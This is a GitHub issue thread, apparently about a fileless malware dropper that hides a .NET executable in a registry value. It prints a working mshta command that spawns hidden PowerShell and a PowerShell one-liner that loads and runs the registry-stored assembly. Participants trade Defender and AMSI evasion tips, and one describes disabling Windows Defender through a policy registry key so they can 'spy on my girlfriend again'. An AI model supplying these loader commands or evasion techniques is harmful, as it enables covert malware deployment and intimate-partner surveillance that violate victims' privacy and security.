Closed AlizerUncaged closed 1 year ago
I ran this in Windows Terminal and it popped up another tab in the terminal with a fresh powershell window. Also the binary from my website seems to work.
```cmd
mshta "javascript:close(new ActiveXObject('WScript.Shell').run('powershell'))"
```
Do you have more info for me, or anything else going on with your system, so that it works here but not on your machine? In particular, did you try to deactivate your AV?
By the way, from tomorrow on until 20 April I'm out of town, but I will catch up with you afterwards.
Seems like Windows Defender is now blocking this script.
Might be... Since this repo is public, the executable sure is detectable. The same applies to all of my projects hosted here. If you need it undetectable, you need to apply changes until it no longer is detected - and not share your work with others.
Edit:
Why do we have to use `mshta` anyways? Can't we just directly spawn a PowerShell process?
You can. But the PowerShell window is briefly visible, and `mshta` is the way I fixed this.
Looks like it's not only `mshta`. I tried this as well:
```powershell
powershell -NoExit [System.Reflection.Assembly]::Load([Microsoft.Win32.Registry]::CurrentUser.OpenSubKey("SOFTWARE\\Microsoft\\Phone").GetValue("Country")).EntryPoint.Invoke($null, @($null))
```
But now I get
Alright, so I was able to solve the problem by disabling Defender via the dropper itself. It does it by adding a new DWORD named `DisableWinDefender` at `Computer\HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender` and setting its value to 1. I can finally spy on my girlfriend again, thanks!
`This script contains malicious content and has been blocked` is an error caused by an AMSI detection. If you do `Assembly.Load()` in .NET, the framework will send the binary to AV for analysis via AMSI. So it's rather a detection issue, not a defunct executable.
There are some AMSI bypasses around; however, it's tricky to do that using just 260 characters. In my other project, r77, I'm using a scheduled task that does not have that limitation, for example.
Seems like this is patched in Windows 11: calling `run()` from `WScript.Shell` results in "Access is denied".

Edit: Why do we have to use `mshta` anyways? Can't we just directly spawn a PowerShell process?

Edit 2: Oh look at that, it's also issue #11, lol.